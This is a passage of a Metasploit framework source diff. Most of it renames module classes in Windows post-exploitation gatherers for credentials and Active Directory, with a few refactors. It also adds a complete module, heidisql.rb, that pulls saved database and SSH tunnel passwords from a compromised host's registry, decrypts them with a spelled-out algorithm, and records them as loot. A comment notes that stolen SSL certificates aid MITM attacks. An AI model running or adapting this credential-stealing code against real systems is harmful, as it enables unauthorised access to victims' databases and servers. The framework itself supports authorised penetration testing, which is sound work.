opt[1].nil? # Default value will only have a single line, for admin port - no adminstration settings settings['admin_port'] = opt[0].text rescue "<none>" - settings['ftp_port'] = "<none>" + settings['ftp_port'] = 21 else - settings['ftp_port'] = opt[0].text rescue "<none>" + settings['ftp_port'] = opt[0].text rescue 21 settings['admin_port'] = opt[16].text rescue "<none>" end settings['admin_pass'] = opt[17].text rescue "<none>" @@ -321,17 +345,14 @@ class Metasploit3 < Msf::Post end settings['ftp_bindip'] = "0.0.0.0" if settings['ftp_bindip'] == "*" || settings['ftp_bindip'].empty? - if settings['ssl'] == "1" - settings['ssl'] = "true" - else - if datastore['SSLCERT'] - print_error("Cannot loot the SSL Certificate, SSL is disabled in the configuration file") - end - settings['ssl'] = "false" + settings['ssl'] = settings['ssl'] == "1" + if !settings['ssl'] && datastore['SSLCERT'] + print_error("Cannot loot the SSL Certificate, SSL is disabled in the configuration file") end settings['ssl_certfile'] = items[45].text rescue "<none>" - if settings['ssl_certfile'] != "<none>" and settings['ssl'] == "true" and datastore['SSLCERT'] # lets get the file if its there could be useful in MITM attacks + # Get the file if it is there. It could be useful in MITM attacks + if settings['ssl_certfile'] != "<none>" && settings['ssl'] and datastore['SSLCERT'] sslfile = session.fs.file.new(settings['ssl_certfile']) until sslfile.eof? sslcert << sslfile.read @@ -386,7 +407,7 @@ class Metasploit3 < Msf::Post account['host'] = settings['ftp_bindip'] account['port'] = settings['ftp_port'] - account['ssl'] = settings['ssl'] + account['ssl'] = settings['ssl'].to_s creds << account vprint_status(" Username: #{account['user']}") @@ -413,15 +434,23 @@ class Metasploit3 < Msf::Post begin doc = REXML::Document.new(data).root - rescue REXML::ParseException => e + rescue REXML::ParseException print_error("Invalid xml format") + return lastser end opt = doc.elements.to_a("Settings/Item") - lastser['ip'] = opt[0].text rescue "<none>" - lastser['port'] = opt[1].text rescue "<none>" - lastser['password'] = opt[2].text rescue "<none>" + opt.each do |item| + case item.attributes['name'] + when /Address/ + lastser['ip'] = item.text + when /Port/ + lastser['port'] = item.text + when /Password/ + lastser['password'] = item.text + end + end lastser['password'] = "<none>" if lastser['password'].nil? diff --git a/modules/post/windows/gather/credentials/flashfxp.rb b/modules/post/windows/gather/credentials/flashfxp.rb index efb320bb2d..8fe7912e4b 100644 --- a/modules/post/windows/gather/credentials/flashfxp.rb +++ b/modules/post/windows/gather/credentials/flashfxp.rb @@ -8,7 +8,7 @@ require 'rex' require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/ftpnavigator.rb b/modules/post/windows/gather/credentials/ftpnavigator.rb index 55c98131a2..b5ab541420 100644 --- a/modules/post/windows/gather/credentials/ftpnavigator.rb +++ b/modules/post/windows/gather/credentials/ftpnavigator.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/ftpx.rb b/modules/post/windows/gather/credentials/ftpx.rb index 0423d9d277..8fec8928ec 100644 --- a/modules/post/windows/gather/credentials/ftpx.rb +++ b/modules/post/windows/gather/credentials/ftpx.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::UserProfiles def initialize(info={}) diff --git a/modules/post/windows/gather/credentials/gpp.rb b/modules/post/windows/gather/credentials/gpp.rb index ba0bacb968..548591ceed 100644 --- a/modules/post/windows/gather/credentials/gpp.rb +++ b/modules/post/windows/gather/credentials/gpp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' require 'rex/parser/group_policy_preferences' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::File include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/heidisql.rb b/modules/post/windows/gather/credentials/heidisql.rb new file mode 100644 index 0000000000..2b9d262719 --- /dev/null +++ b/modules/post/windows/gather/credentials/heidisql.rb @@ -0,0 +1,178 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rex' +require 'msf/core/auxiliary/report' + +class MetasploitModule < Msf::Post + include Msf::Post::Windows::Registry + include Msf::Auxiliary::Report + include Msf::Post::Windows::UserProfiles + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Windows Gather HeidiSQL Saved Password Extraction', + 'Description' => %q{ + This module extracts saved passwords from the HeidiSQL client. These + passwords are stored in the registry. They are encrypted with a custom algorithm. + This module extracts and decrypts these passwords. + }, + 'License' => MSF_LICENSE, + 'Author' => ['h0ng10'], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ] + )) + end + + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def print_error(msg='') + super("#{peer} - #{msg}") + end + + def print_good(msg='') + super("#{peer} - #{msg}") + end + + def run + userhives=load_missing_hives() + userhives.each do |hive| + next if hive['HKU'].nil? + print_status("Looking at Key #{hive['HKU']}") + begin + subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\HeidiSQL\\Servers") + if subkeys.blank? + print_status("HeidiSQL not installed for this user.") + next + end + + service_types = { 0 => 'mysql', + 1 => 'mysql-named-pipe', + 2 => 'mysql-ssh', + 3 => 'mssql-named-pipe', + 4 => 'mssql', + 5 => 'mssql-spx-ipx', + 6 => 'mssql-banyan-vines', + 7 => 'mssql-windows-rpc', + 8 => 'postgres'} + + subkeys.each do |site| + site_key = "#{hive['HKU']}\\Software\\HeidiSQL\\Servers\\#{site}" + host = registry_getvaldata(site_key, "Host") || "" + user = registry_getvaldata(site_key, "User") || "" + port = registry_getvaldata(site_key, "Port") || "" + db_type = registry_getvaldata(site_key, "NetType") || "" + prompt = registry_getvaldata(site_key, "LoginPrompt") || "" + ssh_user = registry_getvaldata(site_key, "SSHtunnelUser") || "" + ssh_host = registry_getvaldata(site_key, "SSHtunnelHost") || "" + ssh_port = registry_getvaldata(site_key, "SSHtunnelPort") || "" + ssh_pass = registry_getvaldata(site_key, "SSHtunnelPass") || "" + win_auth = registry_getvaldata(site_key, "WindowsAuth") || "" + epass = registry_getvaldata(site_key, "Password") + + # skip if windows authentication is used (mssql only) + next if db_type.between?(3,7) and win_auth == 1 + next if epass == nil or epass == "" or epass.length == 1 or prompt == 1 + pass = decrypt(epass) + print_good("Service: #{service_types[db_type]} Host: #{host} Port: #{port} User: #{user} Password: #{pass}") + + service_data = { + address: host == '127.0.0.1' ? rhost : host, + port: port, + service_name: service_types[db_type], + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :session, + session_id: session_db_id, + post_reference_name: self.refname, + private_type: :password, + private_data: pass, + username: user + } + + credential_data.merge!(service_data) + + + # Create the Metasploit::Credential::Core object + credential_core = create_credential(credential_data) + + # Assemble the options hash for creating the Metasploit::Credential::Login object + login_data ={ + core: credential_core, + status: Metasploit::Model::Login::Status::UNTRIED + } + + # Merge in the service data and create our Login + login_data.merge!(service_data) + login = create_credential_login(login_data) + + + # if we have a MySQL via SSH connection, we need to store the SSH credentials as well + if db_type == 2 then + + print_good("Service: ssh Host: #{ssh_host} Port: #{ssh_port} User: #{ssh_user} Password: #{ssh_pass}") + + service_data = { + address: ssh_host, + port: ssh_port, + service_name: 'ssh', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + origin_type: :session, + session_id: session_db_id, + post_reference_name: self.refname, + private_type: :password, + private_data: ssh_pass, + username: ssh_user + } + + credential_data.merge!(service_data) + + # Create the Metasploit::Credential::Core object + credential_core = create_credential(credential_data) + + # Assemble the options hash for creating the Metasploit::Credential::Login object + login_data ={ + core: credential_core, + status: Metasploit::Model::Login::Status::UNTRIED + } + + # Merge in the service data and create our Login + login_data.merge!(service_data) + login = create_credential_login(login_data) + + end + end + rescue ::Rex::Post::Meterpreter::RequestError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + print_error("Cannot Access User SID: #{hive['HKU']} : #{e.message}") + end + end + unload_our_hives(userhives) + end + + def decrypt(encoded) + decoded = "" + shift = Integer(encoded[-1,1]) + encoded = encoded[0,encoded.length-1] + + hex_chars = encoded.scan(/../) + hex_chars.each do |entry| + x = entry.to_i(16) - shift + decoded += x.chr(Encoding::UTF_8) + end + + return decoded + end +end diff --git a/modules/post/windows/gather/credentials/idm.rb b/modules/post/windows/gather/credentials/idm.rb index 6590172922..ed8e72c93e 100644 --- a/modules/post/windows/gather/credentials/idm.rb +++ b/modules/post/windows/gather/credentials/idm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/imail.rb b/modules/post/windows/gather/credentials/imail.rb index db8a566a30..28e6aec748 100644 --- a/modules/post/windows/gather/credentials/imail.rb +++ b/modules/post/windows/gather/credentials/imail.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report @@ -191,7 +191,7 @@ class Metasploit3 < Msf::Post imail_user = datastore['IMAILUSER'] imail_domain = datastore['IMAILDOMAIN'] - print_status("Download iMail user information...") if datastore['VERBOSE'] == false + vprint_status("Download iMail user information...") #Download user data. If no user specified, we dump it all. users = download_info(imail_user, imail_domain) diff --git a/modules/post/windows/gather/credentials/imvu.rb b/modules/post/windows/gather/credentials/imvu.rb index 239eb67dd2..01956553e6 100644 --- a/modules/post/windows/gather/credentials/imvu.rb +++ b/modules/post/windows/gather/credentials/imvu.rb @@ -10,7 +10,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb b/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb index 87d870ebc4..8756884945 100644 --- a/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb +++ b/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/meebo.rb b/modules/post/windows/gather/credentials/meebo.rb index 44364a50e4..97714cd53e 100644 --- a/modules/post/windows/gather/credentials/meebo.rb +++ b/modules/post/windows/gather/credentials/meebo.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/mremote.rb b/modules/post/windows/gather/credentials/mremote.rb index 6658d6c797..bcc7ff14e8 100644 --- a/modules/post/windows/gather/credentials/mremote.rb +++ b/modules/post/windows/gather/credentials/mremote.rb @@ -9,7 +9,7 @@ require 'rex' require 'rexml/document' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/mssql_local_hashdump.rb b/modules/post/windows/gather/credentials/mssql_local_hashdump.rb index f1d00c5d0b..32bd184558 100644 --- a/modules/post/windows/gather/credentials/mssql_local_hashdump.rb +++ b/modules/post/windows/gather/credentials/mssql_local_hashdump.rb @@ -9,7 +9,7 @@ require 'msf/core/auxiliary/report' require 'msf/core/post/windows/mssql' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::MSSQL diff --git a/modules/post/windows/gather/credentials/nimbuzz.rb b/modules/post/windows/gather/credentials/nimbuzz.rb index f42fa10637..61ee3a02e8 100644 --- a/modules/post/windows/gather/credentials/nimbuzz.rb +++ b/modules/post/windows/gather/credentials/nimbuzz.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/outlook.rb b/modules/post/windows/gather/credentials/outlook.rb index bca5db7416..2b7f673fc4 100644 --- a/modules/post/windows/gather/credentials/outlook.rb +++ b/modules/post/windows/gather/credentials/outlook.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/razer_synapse.rb b/modules/post/windows/gather/credentials/razer_synapse.rb index 9d5d445164..591cb8b158 100644 --- a/modules/post/windows/gather/credentials/razer_synapse.rb +++ b/modules/post/windows/gather/credentials/razer_synapse.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'openssl' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::UserProfiles include Msf::Post::File diff --git a/modules/post/windows/gather/credentials/razorsql.rb b/modules/post/windows/gather/credentials/razorsql.rb index a01bb9b7b8..15904682b1 100644 --- a/modules/post/windows/gather/credentials/razorsql.rb +++ b/modules/post/windows/gather/credentials/razorsql.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'openssl' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/rdc_manager_creds.rb b/modules/post/windows/gather/credentials/rdc_manager_creds.rb index 45f0e8ed0d..dcb6c71378 100644 --- a/modules/post/windows/gather/credentials/rdc_manager_creds.rb +++ b/modules/post/windows/gather/credentials/rdc_manager_creds.rb @@ -10,7 +10,7 @@ require 'rex' require 'rexml/document' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::UserProfiles include Msf::Post::Windows::Priv diff --git a/modules/post/windows/gather/credentials/skype.rb b/modules/post/windows/gather/credentials/skype.rb index f950de44e5..208f0e5351 100644 --- a/modules/post/windows/gather/credentials/skype.rb +++ b/modules/post/windows/gather/credentials/skype.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/credentials/smartermail.rb b/modules/post/windows/gather/credentials/smartermail.rb index cb0fce4d6e..402e30f37b 100644 --- a/modules/post/windows/gather/credentials/smartermail.rb +++ b/modules/post/windows/gather/credentials/smartermail.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/smartftp.rb b/modules/post/windows/gather/credentials/smartftp.rb index 1fa9bba41f..be08299ad5 100644 --- a/modules/post/windows/gather/credentials/smartftp.rb +++ b/modules/post/windows/gather/credentials/smartftp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::UserProfiles def initialize(info={}) diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb index c3461846d4..56df968c5f 100644 --- a/modules/post/windows/gather/credentials/spark_im.rb +++ b/modules/post/windows/gather/credentials/spark_im.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'openssl' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/sso.rb b/modules/post/windows/gather/credentials/sso.rb index d2584ecf2c..0225b853bc 100644 --- a/modules/post/windows/gather/credentials/sso.rb +++ b/modules/post/windows/gather/credentials/sso.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/post/windows/priv' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/steam.rb b/modules/post/windows/gather/credentials/steam.rb index f17abf7c5c..2db1ce9589 100644 --- a/modules/post/windows/gather/credentials/steam.rb +++ b/modules/post/windows/gather/credentials/steam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/tortoisesvn.rb b/modules/post/windows/gather/credentials/tortoisesvn.rb index 731d3da103..27ebffe316 100644 --- a/modules/post/windows/gather/credentials/tortoisesvn.rb +++ b/modules/post/windows/gather/credentials/tortoisesvn.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/credentials/total_commander.rb b/modules/post/windows/gather/credentials/total_commander.rb index 1f51aabd04..51e71c843d 100644 --- a/modules/post/windows/gather/credentials/total_commander.rb +++ b/modules/post/windows/gather/credentials/total_commander.rb @@ -8,7 +8,7 @@ require 'rex' require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/trillian.rb b/modules/post/windows/gather/credentials/trillian.rb index a80e9bef9e..1d4b76bfeb 100644 --- a/modules/post/windows/gather/credentials/trillian.rb +++ b/modules/post/windows/gather/credentials/trillian.rb @@ -8,7 +8,7 @@ require 'rex' require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index a4488e672e..5229692c3a 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -10,7 +10,7 @@ require 'rex' require 'msf/core/auxiliary/report' require 'rex/proto/rfb' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report @@ -108,6 +108,20 @@ class Metasploit3 < Msf::Post :port_variable => 'PortNumber='} end + #check uninstall key + begin + root_key, base_key = session.sys.registry.splitkey("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Ultravnc2_is1") + open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ) + vnclocation = open_key.query_value("InstallLocation").data + locations << {:name => 'UltraVNC', + :check_file => vnclocation + "\\ultravnc.ini", + :pass_variable => 'passwd=', + :viewonly_variable => 'passwd2=', + :port_variable => 'PortNumber='} + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error(e.message) + end + locations << {:name => 'WinVNC3_HKLM', :check_reg => 'HKLM\\Software\\ORL\\WinVNC3', :pass_variable => 'Password', diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb index 5af3bdb12d..ea3ebf955c 100644 --- a/modules/post/windows/gather/credentials/windows_autologin.rb +++ b/modules/post/windows/gather/credentials/windows_autologin.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report diff --git a/modules/post/windows/gather/credentials/winscp.rb b/modules/post/windows/gather/credentials/winscp.rb index e9c4d452d1..3cc7a3dcd8 100644 --- a/modules/post/windows/gather/credentials/winscp.rb +++ b/modules/post/windows/gather/credentials/winscp.rb @@ -9,7 +9,7 @@ require 'rex/parser/ini' require 'rex/parser/winscp' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/credentials/wsftp_client.rb b/modules/post/windows/gather/credentials/wsftp_client.rb index 1227e572e2..fafdd63add 100644 --- a/modules/post/windows/gather/credentials/wsftp_client.rb +++ b/modules/post/windows/gather/credentials/wsftp_client.rb @@ -9,7 +9,7 @@ require 'rex/parser/ini' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/windows/gather/dnscache_dump.rb b/modules/post/windows/gather/dnscache_dump.rb index de4bf2fefb..b496b0d2cd 100644 --- a/modules/post/windows/gather/dnscache_dump.rb +++ b/modules/post/windows/gather/dnscache_dump.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/windows/gather/dumplinks.rb b/modules/post/windows/gather/dumplinks.rb index 13d701aac1..58843c819b 100644 --- a/modules/post/windows/gather/dumplinks.rb +++ b/modules/post/windows/gather/dumplinks.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Priv include Msf::Post::Windows::Accounts diff --git a/modules/post/windows/gather/enum_ad_bitlocker.rb b/modules/post/windows/gather/enum_ad_bitlocker.rb index 2801d749ab..6c005e5342 100644 --- a/modules/post/windows/gather/enum_ad_bitlocker.rb +++ b/modules/post/windows/gather/enum_ad_bitlocker.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_computers.rb b/modules/post/windows/gather/enum_ad_computers.rb index 27f3a742c3..0f395c1e53 100644 --- a/modules/post/windows/gather/enum_ad_computers.rb +++ b/modules/post/windows/gather/enum_ad_computers.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_groups.rb b/modules/post/windows/gather/enum_ad_groups.rb index ade732c27a..bf72dad0c7 100644 --- a/modules/post/windows/gather/enum_ad_groups.rb +++ b/modules/post/windows/gather/enum_ad_groups.rb @@ -6,10 +6,10 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP -# include Msf::Post::Windows::Accounts + # include Msf::Post::Windows::Accounts USER_FIELDS = ['name', 'distinguishedname', @@ -19,9 +19,9 @@ class Metasploit3 < Msf::Post super(update_info( info, 'Name' => 'Windows Gather Active Directory Groups', - 'Description' => %{ + 'Description' => %( This module will enumerate AD groups on the specified domain. - }, + ), 'License' => MSF_LICENSE, 'Author' => [ 'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>' @@ -32,6 +32,7 @@ class Metasploit3 < Msf::Post register_options([ OptString.new('ADDITIONAL_FIELDS', [false, 'Additional fields to retrieve, comma separated', nil]), + OptString.new('FILTER', [false, 'Customised LDAP filter', nil]) ], self.class) end @@ -39,14 +40,16 @@ class Metasploit3 < Msf::Post @user_fields = USER_FIELDS.dup if datastore['ADDITIONAL_FIELDS'] - additional_fields = datastore['ADDITIONAL_FIELDS'].gsub(/\s+/,"").split(',') + additional_fields = datastore['ADDITIONAL_FIELDS'].gsub(/\s+/, "").split(',') @user_fields.push(*additional_fields) end max_search = datastore['MAX_SEARCH'] begin - q = query('(objectClass=group)', max_search, @user_fields) + f = "" + f = "(#{datastore['FILTER']})" if datastore['FILTER'] + q = query("(&(objectClass=group)#{f})", max_search, @user_fields) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e # Can't bind or in a network w/ limited accounts print_error(e.message) @@ -68,8 +71,6 @@ class Metasploit3 < Msf::Post # @param [Array<Array<Hash>>] the LDAP query results to parse # @return [Rex::Ui::Text::Table] the table containing all the result data def parse_results(results) - domain = datastore['DOMAIN'] || get_domain - domain_ip = client.net.resolve.resolve_host(domain)[:ip] # Results table holds raw string data results_table = Rex::Ui::Text::Table.new( 'Header' => "Domain Groups", @@ -93,5 +94,4 @@ class Metasploit3 < Msf::Post end results_table end - end diff --git a/modules/post/windows/gather/enum_ad_managedby_groups.rb b/modules/post/windows/gather/enum_ad_managedby_groups.rb index 72959f6086..19644021fb 100644 --- a/modules/post/windows/gather/enum_ad_managedby_groups.rb +++ b/modules/post/windows/gather/enum_ad_managedby_groups.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_service_principal_names.rb b/modules/post/windows/gather/enum_ad_service_principal_names.rb index 125c9feb59..c6a4badebb 100644 --- a/modules/post/windows/gather/enum_ad_service_principal_names.rb +++ b/modules/post/windows/gather/enum_ad_service_principal_names.rb @@ -7,7 +7,7 @@ require 'rex' require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_to_wordlist.rb b/modules/post/windows/gather/enum_ad_to_wordlist.rb index 33f37b1bcf..6da00f76ad 100644 --- a/modules/post/windows/gather/enum_ad_to_wordlist.rb +++ b/modules/post/windows/gather/enum_ad_to_wordlist.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_user_comments.rb b/modules/post/windows/gather/enum_ad_user_comments.rb index 22519eae57..d6759fb211 100644 --- a/modules/post/windows/gather/enum_ad_user_comments.rb +++ b/modules/post/windows/gather/enum_ad_user_comments.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP diff --git a/modules/post/windows/gather/enum_ad_users.rb b/modules/post/windows/gather/enum_ad_users.rb index 2fc5ed7779..23e17152cc 100644 --- a/modules/post/windows/gather/enum_ad_users.rb +++ b/modules/post/windows/gather/enum_ad_users.rb @@ -6,7 +6,7 @@ require 'rex' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::Windows::LDAP include Msf::Post::Windows::Accounts @@ -47,6 +47,7 @@ class Metasploit3 < Msf::Post OptBool.new('EXCLUDE_LOCKED', [true, 'Exclude in search locked accounts..', false]), OptBool.new('EXCLUDE_DISABLED', [true, 'Exclude from search disabled accounts.', false]), OptString.new('ADDITIONAL_FIELDS', [false, 'Additional fields to retrieve, comma separated', nil]), + OptString.new('FILTER', [false, 'Customised LDAP filter', nil]), OptString.new('GROUP_MEMBER', [false, 'Recursively list users that are effectve members of the group DN specified.', nil]), OptEnum.new('UAC', [true, 'Filter on User Account Control Setting.', 'ANY', [ @@ -146,6 +147,7 @@ class Metasploit3 < Msf::Post inner_filter << '(!(lockoutTime>=1))' if datastore['EXCLUDE_LOCKED'] inner_filter << '(!(userAccountControl:1.2.840.113556.1.4.803:=2))' if datastore['EXCLUDE_DISABLED'] inner_filter << "(memberof:1.2.840.113556.1.4.1941:=#{datastore['GROUP_MEMBER']})" if datastore['GROUP_MEMBER'] + inner_filter << "(#{datastore['FILTER']})" if datastore['FILTER'] != "" case datastore['UAC'] when 'ANY' when 'NO_PASSWORD' diff --git a/modules/post/windows/gather/enum_applications.rb b/modules/post/windows/gather/enum_applications.rb index b3b2a25bab..a368256941 100644 --- a/modules/post/windows/gather/enum_applications.rb +++ b/modules/post/windows/gather/enum_applications.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/windows/gather/enum_artifacts.rb b/modules/post/windows/gather/enum_artifacts.rb index 2247ea9dc1..f07817d3c8 100644 --- a/modules/post/windows/gather/enum_artifacts.rb +++ b/modules/post/windows/gather/enum_artifacts.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'yaml' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report include Msf::Post::File diff --git a/modules/post/windows/gather/enum_av_excluded.rb b/modules/post/windows/gather/enum_av_excluded.rb index 0aa167b783..3d04c4fb31 100644 --- a/modules/post/windows/gather/enum_av_excluded.rb +++ b/modules/post/windows/gather/enum_av_excluded.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry def initialize(info = {}) diff --git 